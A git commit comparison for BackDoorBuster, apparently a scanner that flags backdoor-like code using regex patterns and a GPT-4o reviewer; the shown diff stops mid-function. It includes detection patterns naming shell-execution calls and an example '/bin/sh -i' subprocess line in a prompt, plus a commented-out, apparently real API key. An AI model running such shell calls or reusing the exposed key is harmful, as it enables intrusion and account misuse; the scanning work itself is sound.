Compare commits
212 Commits
bf4c1e6702
...
main
| Author | SHA1 | Date | |
|---|---|---|---|
| c3ed3e166e | |||
| f6fa95ba16 | |||
| 94407e71b8 | |||
| 2adb1cbc2e | |||
| 430d2b8f8a | |||
| 752e774714 | |||
| 373defc5bb | |||
| c811e434c6 | |||
| 167bbe0a14 | |||
| e9b1e82492 | |||
| a2651b499e | |||
| a5f7665799 | |||
| caeee4d179 | |||
| 7198c8b4da | |||
| 843c9d7ba3 | |||
| cb30fddb1c | |||
| 81cbc88e9b | |||
| fc4e0e3b30 | |||
| ec30999d2c | |||
| 0f2fb3c925 | |||
| fd4ecce710 | |||
| 610e35f868 | |||
| 6e1c0e5ae6 | |||
| 977841837d | |||
| 42135c516c | |||
| 72901463c6 | |||
| 65820966df | |||
| b3435c00c3 | |||
| cd779ef43f | |||
| fbeba5b4fc | |||
| 3f6375977c | |||
| 5aafb1c24f | |||
| 5d41503b39 | |||
| 5a228e5cb0 | |||
| 4f5c67b32e | |||
| 4a55822a8f | |||
| 4e67f4ebed | |||
| 6f51f86d6a | |||
| f113449fc4 | |||
| 4f4860342c | |||
| 49408eda9f | |||
| e653ddd726 | |||
| ca69536e41 | |||
| d1ac4594e4 | |||
| 1a71a72ddf | |||
| da9b2b52ac | |||
| 62b77812af | |||
| 7eb4de8e6c | |||
| b99334ed12 | |||
| 17245a9bcf | |||
| b673575fe4 | |||
| df65fff2c7 | |||
| aeb4a33d98 | |||
| 89b37ddfd6 | |||
| f798cf143c | |||
| 95feda67d9 | |||
| 5ed90e39f8 | |||
| e80e83ad51 | |||
| 7cc81141c6 | |||
| 2a94f27edc | |||
| 0cd826c2fd | |||
| d56d0173ad | |||
| 0c4f560b7a | |||
| 41b16c53bc | |||
| 99b481059b | |||
| d2b0fb286c | |||
| 8a14ef4341 | |||
| e418bbf380 | |||
| d30ea0ca61 | |||
| 5552a7e448 | |||
| 99457f1ceb | |||
| 2b90268628 | |||
| dd4ab45cbf | |||
| 3f8b2a7987 | |||
| 40f5c07fa1 | |||
| b73170cd2d | |||
| b518fef6d2 | |||
| accd50e8ce | |||
| fab5e680ef | |||
| 6967a154f7 | |||
| c97780cde3 | |||
| b544007e6b | |||
| b1bc566c09 | |||
| f0e2251dc0 | |||
| faf68760c9 | |||
| 44c6086b8c | |||
| 27ec14be54 | |||
| 21d1a6f3cc | |||
| dbdfc1897c | |||
| 8fed7af432 | |||
| 9a7c38f1a8 | |||
| dd45c467a3 | |||
| 79a605a6b4 | |||
| 9d6f054478 | |||
| 569497f79e | |||
| 958dee355e | |||
| 8d445b11a4 | |||
| ed3b9e7e4c | |||
| 97fbf649a8 | |||
| db3244f55a | |||
| d073cfad31 | |||
| 0ae787002c | |||
| fa86f12a48 | |||
| 2e5460a522 | |||
| 594e0934e5 | |||
| 252d9c655e | |||
| 80fff100b5 | |||
| 3e0dd66d31 | |||
| 24206b13af | |||
| 3c7e5f4c3d | |||
| ca68c1ee94 | |||
| 84f4bf55bc | |||
| 6c3d18dd58 | |||
| e80838836c | |||
| bfacbb757c | |||
| 9d3d97209e | |||
| 4bbe8ea62f | |||
| 06387da6f4 | |||
| 6131de5ed1 | |||
| 7557f11672 | |||
| e28cb2416d | |||
| 953a320dd5 | |||
| 000146a835 | |||
| ebfc70eeae | |||
| 7523e0c06a | |||
| 1f9ccc53c1 | |||
| d771976b35 | |||
| 7a420b9bf8 | |||
| f0a915c0fd | |||
| bc067743ab | |||
| 698cf1c75c | |||
| b3f4a77a73 | |||
| 18454a0228 | |||
| 9e6b13d80e | |||
| 54419f9b53 | |||
| 4abd93f688 | |||
| 135a07219d | |||
| be59c891e5 | |||
| cafc83e517 | |||
| a6b67856ef | |||
| 7f3591959b | |||
| 92c3a5546b | |||
| dd109e5f5d | |||
| ae2ee482ad | |||
| 4835af7ff7 | |||
| 6041a8f573 | |||
| bc852ec52c | |||
| d60700e215 | |||
| 464db87919 | |||
| 102c631ed9 | |||
| 5eee69704a | |||
| 323200fd85 | |||
| c6deb1a174 | |||
| 50505aefb3 | |||
| 6533644222 | |||
| 00af8557ae | |||
| 4ea3685635 | |||
| ad41eea7d9 | |||
| d38f217b96 | |||
| 4bafab90f4 | |||
| 37d5c80724 | |||
| da24e1b103 | |||
| 9d5879b796 | |||
| b01e1f9a46 | |||
| 3f2f6070a8 | |||
| b0a99cb4f7 | |||
| 5714558965 | |||
| f2d4e1befc | |||
| 278e9ee42e | |||
| 2c844c8ed1 | |||
| 5993a14368 | |||
| 27ef6c9acc | |||
| d9c183fbd8 | |||
| c5cfcb00f7 | |||
| c2782327c3 | |||
| cb350b6288 | |||
| 74d0587e37 | |||
| 52230d096b | |||
| dd891443a9 | |||
| bf4a96cf34 | |||
| c366c0e672 | |||
| e2fa93f095 | |||
| f13d9266c6 | |||
| 52a5c94758 | |||
| 2c088eeb25 | |||
| a1b277f573 | |||
| 2b1847715d | |||
| b9ccc42a85 | |||
| ac99e99216 | |||
| 2f4903376c | |||
| 53a7120bfc | |||
| 973f863e92 | |||
| 28f2f7abf1 | |||
| fa98d64577 | |||
| c140f21b8e | |||
| 9be13bc4e3 | |||
| bfcbf99cf4 | |||
| 9155bf7a00 | |||
| 8c3616e90f | |||
| 8dc486cf47 | |||
| 9e5640ad80 | |||
| 3d961aa2d7 | |||
| a329bd41ad | |||
| 0c43771bdf | |||
| f2f8341e2c | |||
| 2ea91886df | |||
| 67a8b8fc6f | |||
| abc52b9249 | |||
| 26b3328a72 | |||
| 7d4f2b1693 | |||
| 144608abcb | |||
| 2c18a482cf |
1
.gitattributes
vendored
Normal file
1
.gitattributes
vendored
Normal file
@@ -0,0 +1 @@
|
||||
*.webp filter=lfs diff=lfs merge=lfs -text
|
||||
32
.github/actions/Auto_check_backdoor/action.yml
vendored
Normal file
32
.github/actions/Auto_check_backdoor/action.yml
vendored
Normal file
@@ -0,0 +1,32 @@
|
||||
name: "Backdoor Detection"
|
||||
description: "Perform backdoor and vulnerability detection on your code and dependencies."
|
||||
inputs:
|
||||
code_path:
|
||||
description: "Path to the code directory to be analyzed."
|
||||
required: true
|
||||
requirements_file:
|
||||
description: "Path to the requirements.txt file."
|
||||
required: true
|
||||
output_format:
|
||||
description: "Output format for the detection results (html, md, txt)."
|
||||
required: true
|
||||
default: "txt"
|
||||
runs:
|
||||
using: "composite"
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: "3.x"
|
||||
- name: Install dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip install packaging
|
||||
- name: Run Backdoor Detection
|
||||
run: python ${{ github.workspace }}/detection/backdoor_detection.py ${{ inputs.code_path }} ${{ inputs.output_format }}
|
||||
shell: bash
|
||||
- name: Run Requirements Detection
|
||||
run: python ${{ github.workspace }}/detection/requirements_detection.py ${{ github.workspace }}/crawler/trans_extracted_data.txt ${{ inputs.requirements_file }} ${{ inputs.output_format }}
|
||||
shell: bash
|
||||
21
.github/workflows/python-tests.yml
vendored
Normal file
21
.github/workflows/python-tests.yml
vendored
Normal file
@@ -0,0 +1,21 @@
|
||||
name: Python application test
|
||||
|
||||
on:
|
||||
push:
|
||||
branches: [main]
|
||||
pull_request:
|
||||
branches: [main]
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: "ubuntu-latest"
|
||||
|
||||
steps:
|
||||
- uses: https://git.mamahaha.work/actions/checkout@v2
|
||||
- name: Install dependencies
|
||||
run: pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
|
||||
- name: Run tests
|
||||
run: python -m unittest discover -s tests
|
||||
env:
|
||||
OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
|
||||
http_proxy: http://192.168.1.2:10809
|
||||
4
.gitignore
vendored
4
.gitignore
vendored
@@ -158,5 +158,5 @@ cython_debug/
|
||||
# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
|
||||
# and can be added to the global gitignore or merged into this file. For a more nuclear
|
||||
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
|
||||
#.idea/
|
||||
|
||||
.idea/
|
||||
tmp/
|
||||
|
||||
2
MANIFEST.in
Normal file
2
MANIFEST.in
Normal file
@@ -0,0 +1,2 @@
|
||||
include README.md
|
||||
include LICENSE
|
||||
88
README.md
88
README.md
@@ -1,2 +1,90 @@
|
||||
# BackDoorBuster
|
||||
|
||||

|
||||
|
||||
## 项目背景
|
||||
|
||||
随着网络安全威胁的增加,恶意软件和后门的检测成为了保护个人和组织数据安全的重要任务。后门通常被隐藏在合法软件中,给黑客提供远程控制目标系统的能力。本项目旨在开发一个工具,能够有效识别和评估潜在的后门风险。
|
||||
|
||||
## 项目目的
|
||||
|
||||
本项目的主要目的是开发一个自动化工具,用于检测和评估代码库中潜在的后门风险。通过搜索包含特定敏感操作(如直接调用 `shell`)的代码段,并对发现的结果进行评级,从而帮助安全团队识别和修复安全漏洞。
|
||||
|
||||
## 项目开发目标
|
||||
|
||||
- **敏感操作检测**: 使用正则表达式来搜索代码中可能指示后门的敏感操作,如命令行执行(例如 `bin/sh`)。
|
||||
- **风险评级系统**: 对检测到的敏感操作进行分类和风险评级,帮助用户理解每个发现的潜在威胁级别。
|
||||
- **简易的用户接口**: 提供一个简单的命令行接口,允许用户快速扫描项目并获取报告。
|
||||
- **报告生成**: 自动生成详细的检测报告,列出所有发现的敏感操作和对应的风险等级。
|
||||
- **持续更新与维护**: 随着新的后门技术和检测方法的出现,持续更新正则表达式库和评级标准。
|
||||
|
||||
## 打包
|
||||
|
||||
### pip
|
||||
|
||||
#### 打包命令
|
||||
|
||||
```bash
|
||||
pip install wheel
|
||||
python setup.py sdist bdist_wheel
|
||||
```
|
||||
|
||||
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
|
||||
|
||||
#### 本地安装
|
||||
|
||||
- 安装 .whl 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
|
||||
```
|
||||
|
||||
- 安装 .tar.gz 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0.tar.gz
|
||||
```
|
||||
|
||||
#### 上传到 PyPI
|
||||
|
||||
- 安装 twine:
|
||||
|
||||
``` bash
|
||||
pip install twine
|
||||
```
|
||||
|
||||
- 使用 twine 上传包到 PyPI:
|
||||
|
||||
``` bash
|
||||
twine upload dist/*
|
||||
```
|
||||
|
||||
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
|
||||
|
||||
#### 使用 PyPI 安装
|
||||
|
||||
包上传到 PyPI 后,可以通过以下命令安装:
|
||||
|
||||
``` bash
|
||||
pip install backdoor_buster
|
||||
```
|
||||
|
||||
## 使用说明
|
||||
|
||||
1. 执行扫描:
|
||||
|
||||
```bash
|
||||
python -m detection <project_directory> -o <path> -m <mode>
|
||||
```
|
||||
|
||||
2. 查看报告:
|
||||
|
||||
报告将以文本形式输出在控制台,并可选择输出到指定文件。
|
||||
|
||||
## 贡献指南
|
||||
|
||||
欢迎安全研究人员和开发人员贡献代码,改进正则表达式和评级逻辑。请通过 pull requests 提交您的贡献。
|
||||
|
||||
## 许可证
|
||||
|
||||
本项目采用 `MIT` 许可证。详情请见 [LICENSE](./LICENSE) 文件。
|
||||
|
||||
0
__init__.py
Normal file
0
__init__.py
Normal file
32
action.yml
Normal file
32
action.yml
Normal file
@@ -0,0 +1,32 @@
|
||||
name: "Backdoor Detection"
|
||||
description: "Perform backdoor and vulnerability detection on your code and dependencies."
|
||||
inputs:
|
||||
code_path:
|
||||
description: "Path to the code directory to be analyzed."
|
||||
required: true
|
||||
requirements_file:
|
||||
description: "Path to the requirements.txt file."
|
||||
required: true
|
||||
output_format:
|
||||
description: "Output format for the detection results (html, md, txt)."
|
||||
required: true
|
||||
default: "txt"
|
||||
runs:
|
||||
using: "composite"
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: "3.x"
|
||||
- name: Install dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip install packaging
|
||||
- name: Run Backdoor Detection
|
||||
run: python ${{ github.workspace }}/detection/backdoor_detection.py ${{ inputs.code_path }} ${{ inputs.output_format }}
|
||||
shell: bash
|
||||
- name: Run Requirements Detection
|
||||
run: python ${{ github.workspace }}/detection/requirements_detection.py ${{ github.workspace }}/crawler/trans_extracted_data.txt ${{ inputs.requirements_file }} ${{ inputs.output_format }}
|
||||
shell: bash
|
||||
BIN
banner.webp
(Stored with Git LFS)
Normal file
BIN
banner.webp
(Stored with Git LFS)
Normal file
Binary file not shown.
105
detection/GPTdetection.py
Normal file
105
detection/GPTdetection.py
Normal file
@@ -0,0 +1,105 @@
|
||||
import json
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
|
||||
from .utils import *
|
||||
import openai
|
||||
# import signal
|
||||
|
||||
|
||||
class TimeoutException(Exception):
|
||||
"""Custom exception to handle timeouts."""
|
||||
|
||||
pass
|
||||
|
||||
|
||||
def timeout_handler(signum, frame):
|
||||
"""Handle the SIGALRM signal by raising a TimeoutException."""
|
||||
raise TimeoutException
|
||||
|
||||
|
||||
def detectGPT(content: str):
|
||||
api_key = os.getenv("OPENAI_API_KEY")
|
||||
if api_key is None:
|
||||
raise ValueError("env OPENAI_API_KEY no set")
|
||||
|
||||
# Set alarm timer
|
||||
# signal.signal(signal.SIGTERM, timeout_handler)
|
||||
# signal.alarm(10)
|
||||
|
||||
client = openai.OpenAI(base_url="https://api.kpi7.cn/v1", api_key=api_key)
|
||||
text = content
|
||||
# client = openai.OpenAI(api_key="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") #测试用key
|
||||
response = client.chat.completions.create(
|
||||
messages=[
|
||||
{
|
||||
"role": "system",
|
||||
"content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: "
|
||||
'[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n'
|
||||
"You are required to only output the json format. Do not output any other information.请注意:只对有具体危害的代码片段判定为有风险。\n"
|
||||
"For examples:\nos.system('ls'),subprocess.call(['ls', '-l']),subprocess.call([\"/bin/sh\",\"-i\"]),eval(code),exec(code) and so on.\n"
|
||||
"Please IGNORE the risks that dont matter a lot.",
|
||||
},
|
||||
{
|
||||
"role": "user",
|
||||
"content": text,
|
||||
},
|
||||
],
|
||||
model="gpt-4o",
|
||||
)
|
||||
try:
|
||||
message_content = response.choices[0].message.content
|
||||
if message_content is None:
|
||||
raise ValueError("API response content is None")
|
||||
res_json = json.loads(message_content)
|
||||
|
||||
except json.JSONDecodeError:
|
||||
raise ValueError("Error: Could not parse the response. Please try again.")
|
||||
|
||||
except TimeoutException:
|
||||
raise TimeoutException("The api call timed out")
|
||||
|
||||
# finally:
|
||||
# signal.alarm(0)
|
||||
|
||||
classified_results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
for res in res_json:
|
||||
try:
|
||||
classified_results[res["Risk"]].append(
|
||||
(res["Line"], text.split("\n")[res["Line"] - 1].strip())
|
||||
)
|
||||
except IndexError:
|
||||
pass
|
||||
return classified_results
|
||||
|
||||
|
||||
def GPTdetectFileList(fileList):
|
||||
# print(len(fileList))
|
||||
results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
threads = []
|
||||
for file in fileList:
|
||||
content = read_file_content(str(file))
|
||||
threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results)))
|
||||
for thread in threads:
|
||||
thread.start()
|
||||
time.sleep(0.1)
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
return results
|
||||
|
||||
|
||||
def GPTThread(filename, content, results):
|
||||
try:
|
||||
res = detectGPT(content)
|
||||
# print(res)
|
||||
for key in res:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{filename}: Line {line_num}", line)
|
||||
for line_num, line in res[key]
|
||||
]
|
||||
)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
52
detection/Regexdetection.py
Normal file
52
detection/Regexdetection.py
Normal file
@@ -0,0 +1,52 @@
|
||||
import re
|
||||
from typing import Dict, List, Tuple
|
||||
from .utils import remove_comments
|
||||
|
||||
|
||||
def find_dangerous_functions(
|
||||
file_content: str, file_extension: str
|
||||
) -> Dict[str, List[Tuple[int, str]]]:
|
||||
patterns = {
|
||||
".py": {
|
||||
r"\bsystem\(": "high",
|
||||
r"\bexec\(": "high",
|
||||
r"\bpopen\(": "medium",
|
||||
r"\beval\(": "high",
|
||||
r"\bsubprocess": "medium",
|
||||
r"\b__getattribute__\(": "high",
|
||||
r"\bgetattr\(": "medium",
|
||||
r"\b__import__\(": "high",
|
||||
},
|
||||
".js": {
|
||||
r"\beval\(": "high",
|
||||
r"\bexec\(": "high",
|
||||
r"\bchild_process\.exec\(": "high",
|
||||
},
|
||||
".cpp": {
|
||||
r"\bsystem\(": "high",
|
||||
},
|
||||
".pyc": {
|
||||
r"\bexec\b": "high",
|
||||
r"\beval\b": "high",
|
||||
r"\bos\.system\b": "high",
|
||||
r"\bos\.exec\b": "high",
|
||||
r"\bos\.fork\b": "high",
|
||||
r"\bos\.kill\b": "high",
|
||||
r"\bos\.popen\b": "medium",
|
||||
r"\bos\.spawn\b": "medium",
|
||||
r"\bsubprocess": "medium",
|
||||
},
|
||||
}
|
||||
risk_patterns = patterns.get(file_extension, {})
|
||||
classified_results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
if file_content is not None:
|
||||
for line_number, line in enumerate(file_content.split("\n"), start=1):
|
||||
clean_line = remove_comments(line, file_extension)
|
||||
if not clean_line:
|
||||
continue
|
||||
# 消除换行符,避免影响正则匹配
|
||||
clean_line = clean_line.replace("\\n", "")
|
||||
for pattern, risk_level in risk_patterns.items():
|
||||
if re.search(pattern, clean_line, re.MULTILINE | re.DOTALL):
|
||||
classified_results[risk_level].append((line_number, clean_line))
|
||||
return classified_results
|
||||
0
detection/__init__.py
Normal file
0
detection/__init__.py
Normal file
502
detection/__main__.py
Normal file
502
detection/__main__.py
Normal file
@@ -0,0 +1,502 @@
|
||||
import json
|
||||
import os
|
||||
from typing import Dict, List, Tuple, Optional
|
||||
from reportlab.lib.pagesizes import letter
|
||||
from reportlab.lib.styles import getSampleStyleSheet
|
||||
from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate
|
||||
|
||||
from detection.pickle_detection import pickleDataDetection
|
||||
|
||||
from .requirements_detection import requirement_detection
|
||||
from .Regexdetection import find_dangerous_functions
|
||||
from .GPTdetection import detectGPT, GPTdetectFileList
|
||||
|
||||
# from .cngptdetection import detectGPT,GPTdetectFileList
|
||||
from .pyc_detection import disassemble_pyc
|
||||
from .utils import *
|
||||
import sys
|
||||
from colorama import init, Fore, Style
|
||||
from tqdm import tqdm
|
||||
from pathlib import Path
|
||||
|
||||
PYCDC_FLAG = True
|
||||
PYCDC_ADDR_FLAG = True
|
||||
SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc",".pkl",".pickle"}
|
||||
OUTPUT_FORMATS = ["html", "md", "txt", "pdf"]
|
||||
ORDERS = [
|
||||
"__import__",
|
||||
"system",
|
||||
"exec",
|
||||
"popen",
|
||||
"eval",
|
||||
"subprocess",
|
||||
"__getattribute__",
|
||||
"getattr",
|
||||
"child_process",
|
||||
"kill",
|
||||
"fork",
|
||||
]
|
||||
|
||||
# Initialize colorama
|
||||
init(autoreset=True)
|
||||
|
||||
ORANGE = "\033[38;5;214m"
|
||||
CYAN = Fore.CYAN
|
||||
|
||||
|
||||
def supports_color() -> bool:
|
||||
"""
|
||||
Checks if the running terminal supports color output.
|
||||
|
||||
Returns:
|
||||
bool: True if the terminal supports color, False otherwise.
|
||||
"""
|
||||
# Windows support
|
||||
if sys.platform == "win32":
|
||||
return True
|
||||
# Check if output is a TTY (terminal)
|
||||
if hasattr(sys.stdout, "isatty") and sys.stdout.isatty():
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
def supports_emoji() -> bool:
|
||||
"""
|
||||
Checks if the running terminal supports emoji output.
|
||||
|
||||
Returns:
|
||||
bool: True if the terminal supports emoji, False otherwise.
|
||||
"""
|
||||
# This is a simple check. Modern terminals typically support emoji.
|
||||
return sys.platform != "win32" or os.getenv("WT_SESSION") is not None
|
||||
|
||||
|
||||
def highlight_orders(line: str, risk_level: str, use_color: bool) -> str:
|
||||
"""
|
||||
Highlights specific orders in the line based on risk level.
|
||||
|
||||
Args:
|
||||
line (str): The line to highlight.
|
||||
risk_level (str): The risk level of the line ("high", "medium", "low").
|
||||
use_color (bool): Whether to use color for highlighting.
|
||||
|
||||
Returns:
|
||||
str: The highlighted line.
|
||||
"""
|
||||
risk_colors = {
|
||||
"high": Fore.RED,
|
||||
"medium": Fore.YELLOW,
|
||||
"low": CYAN,
|
||||
}
|
||||
color = risk_colors.get(risk_level, Fore.WHITE) if use_color else ""
|
||||
reset = Style.RESET_ALL if use_color else ""
|
||||
|
||||
for order in ORDERS:
|
||||
line = line.replace(order, f"{color}{order}{reset}")
|
||||
return line
|
||||
|
||||
|
||||
def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str:
|
||||
"""
|
||||
Generates a formatted text report for security analysis results.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
|
||||
Returns:
|
||||
str: The formatted text report as a string.
|
||||
"""
|
||||
use_color = supports_color()
|
||||
use_emoji = supports_emoji()
|
||||
|
||||
text_output = "Security Analysis Report\n"
|
||||
text_output += "=" * 30 + "\n\n"
|
||||
# text_output+= "chatGPT检测结果:\n\n"
|
||||
|
||||
for risk_level, entries in results.items():
|
||||
# print(risk_level, entries)
|
||||
if risk_level == "pickles":
|
||||
text_output += f"Pickles:\n"
|
||||
for i in entries:
|
||||
text_output += f" {i['file']}:{json.dumps(i['result'])}\n"
|
||||
elif entries and risk_level != "none":
|
||||
risk_color = (
|
||||
{
|
||||
"high": Fore.RED,
|
||||
"medium": Fore.YELLOW,
|
||||
"low": Fore.GREEN,
|
||||
}.get(risk_level, Fore.WHITE)
|
||||
if use_color
|
||||
else ""
|
||||
)
|
||||
|
||||
risk_title = (
|
||||
{
|
||||
"High": "👹",
|
||||
"Medium": "👾",
|
||||
"Low": "👻",
|
||||
}
|
||||
if use_emoji
|
||||
else {
|
||||
"High": "",
|
||||
"Medium": "",
|
||||
"Low": "",
|
||||
}
|
||||
)
|
||||
|
||||
text_output += f"{risk_color}{risk_level.capitalize()} Risk{risk_title[risk_level.capitalize()]}:{Style.RESET_ALL if use_color else ''}\n"
|
||||
text_output += "-" * (len(risk_level) + 6) + "\n"
|
||||
for line_num, line in entries:
|
||||
line = highlight_orders(line, risk_level, use_color)
|
||||
line_text = f"{Style.RESET_ALL if use_color else ''} {Fore.GREEN if use_color else ''}{line_num}{Style.RESET_ALL if use_color else ''}: {line}{Style.RESET_ALL if use_color else ''}\n"
|
||||
text_output += line_text
|
||||
text_output += "\n"
|
||||
|
||||
return text_output
|
||||
|
||||
|
||||
def output_results(
|
||||
results: Dict[str, List[Tuple[int, str]]],
|
||||
output_format: str,
|
||||
output_file: Optional[str] = None,
|
||||
) -> None:
|
||||
"""
|
||||
Outputs the security analysis results in the specified format.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
output_format (str): The format to output the results in. Supported formats: "pdf", "html", "md", "txt".
|
||||
output_file (Optional[str]): The name of the file to save the output. If None, prints to the terminal.
|
||||
"""
|
||||
OUTPUT_FORMATS = {"pdf", "html", "md", "txt"}
|
||||
|
||||
if output_file:
|
||||
file_name, file_ext = os.path.splitext(output_file)
|
||||
if output_format not in OUTPUT_FORMATS:
|
||||
output_format = "txt"
|
||||
output_file = f"{file_name}.txt"
|
||||
results_dir = os.path.dirname(output_file)
|
||||
if not os.path.exists(results_dir) and results_dir != "":
|
||||
os.makedirs(results_dir)
|
||||
if output_format == "pdf":
|
||||
output_pdf(results, output_file)
|
||||
elif output_format == "html":
|
||||
output_html(results, output_file)
|
||||
elif output_format == "md":
|
||||
output_markdown(results, output_file)
|
||||
else: # Default to txt
|
||||
output_text(results, output_file)
|
||||
else:
|
||||
# If no output file is specified, default to text output to the terminal.
|
||||
txt_output = generate_text_content(results)
|
||||
print(txt_output)
|
||||
|
||||
|
||||
def output_pdf(results: Dict[str, List[Tuple[int, str]]], file_name):
|
||||
doc = SimpleDocTemplate(file_name, pagesize=letter)
|
||||
story = []
|
||||
styles = getSampleStyleSheet()
|
||||
|
||||
# Add the title centered
|
||||
title_style = styles["Title"]
|
||||
title_style.alignment = 1 # Center alignment
|
||||
title = Paragraph("Security Analysis Report", title_style)
|
||||
story.append(title)
|
||||
story.append(Spacer(1, 20)) # Space after title
|
||||
|
||||
# Add risk levels and entries
|
||||
normal_style = styles["BodyText"]
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
story.append(
|
||||
Paragraph(f"{risk_level.capitalize()} Risk:", styles["Heading2"])
|
||||
)
|
||||
for line_num, line in entries:
|
||||
entry = Paragraph(f"Line {line_num}: {line}", normal_style)
|
||||
story.append(entry)
|
||||
story.append(Spacer(1, 12)) # Space between sections
|
||||
|
||||
doc.build(story)
|
||||
|
||||
|
||||
def output_html(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
"""
|
||||
Generates an HTML report for security analysis results.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
file_name (Optional[str]): The name of the file to save the HTML output. If None, returns the HTML string.
|
||||
|
||||
Returns:
|
||||
Optional[str]: The HTML string if file_name is None, otherwise None.
|
||||
"""
|
||||
html_output = """
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png">
|
||||
<title>Security Analysis Report</title>
|
||||
<style>
|
||||
body {
|
||||
background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg');
|
||||
background-size: 100%, auto;
|
||||
background-attachment: fixed;
|
||||
font-family: Arial, sans-serif;
|
||||
}
|
||||
h1, h2 {
|
||||
color: white;
|
||||
}
|
||||
ul {
|
||||
list-style-type: none;
|
||||
padding: 0;
|
||||
}
|
||||
li {
|
||||
background: rgba(255, 255, 255, 0.8);
|
||||
margin: 5px 0;
|
||||
padding: 10px;
|
||||
border-radius: 5px;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Security Analysis Report</h1>
|
||||
"""
|
||||
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
risk_title = {
|
||||
"High": f"<h2>{risk_level.capitalize()} Risk👹</h2><ul>",
|
||||
"Medium": f"<h2>{risk_level.capitalize()} Risk👾</h2><ul>",
|
||||
"Low": f"<h2>{risk_level.capitalize()} Risk👻</h2><ul>",
|
||||
}
|
||||
html_output += risk_title[risk_level.capitalize()]
|
||||
for line_num, line in entries:
|
||||
html_output += f"<li>{line_num}: {line}</li>"
|
||||
html_output += "</ul>"
|
||||
|
||||
html_output += "</body></html>"
|
||||
|
||||
if file_name:
|
||||
with open(file_name, "w", encoding="utf-8") as file:
|
||||
file.write(html_output)
|
||||
return None
|
||||
else:
|
||||
return html_output
|
||||
|
||||
|
||||
def output_markdown(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
"""
|
||||
Generates a Markdown report for security analysis results.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
file_name (Optional[str]): The name of the file to save the Markdown output. If None, returns the Markdown string.
|
||||
|
||||
Returns:
|
||||
Optional[str]: The Markdown string if file_name is None, otherwise None.
|
||||
"""
|
||||
md_output = "# Security Analysis Report\n\n"
|
||||
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
md_output += f"## {risk_level.capitalize()} Risk\n\n"
|
||||
md_output += "| Line Number | Description |\n"
|
||||
md_output += "|-------------|-------------|\n"
|
||||
for line_num, line in entries:
|
||||
md_output += f"| {line_num} | {line} |\n"
|
||||
md_output += "\n"
|
||||
|
||||
if file_name:
|
||||
with open(file_name, "w") as file:
|
||||
file.write(md_output)
|
||||
return None
|
||||
else:
|
||||
return md_output
|
||||
|
||||
|
||||
def output_text(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
"""
|
||||
Generates a plain text report for security analysis results.
|
||||
|
||||
Args:
|
||||
results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
|
||||
file_name (Optional[str]): The name of the file to save the text output. If None, returns the text string.
|
||||
|
||||
Returns:
|
||||
Optional[str]: The text string if file_name is None, otherwise None.
|
||||
"""
|
||||
text_output = "Security Analysis Report\n"
|
||||
text_output += "=" * len("Security Analysis Report") + "\n\n"
|
||||
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
text_output += f"{risk_level.capitalize()} Risk:\n"
|
||||
text_output += "-" * len(f"{risk_level.capitalize()} Risk:") + "\n"
|
||||
for line_num, line in entries:
|
||||
text_output += f" Line {line_num}: {line}\n"
|
||||
text_output += "\n"
|
||||
|
||||
if file_name:
|
||||
with open(file_name, "w") as file:
|
||||
file.write(text_output)
|
||||
return None
|
||||
else:
|
||||
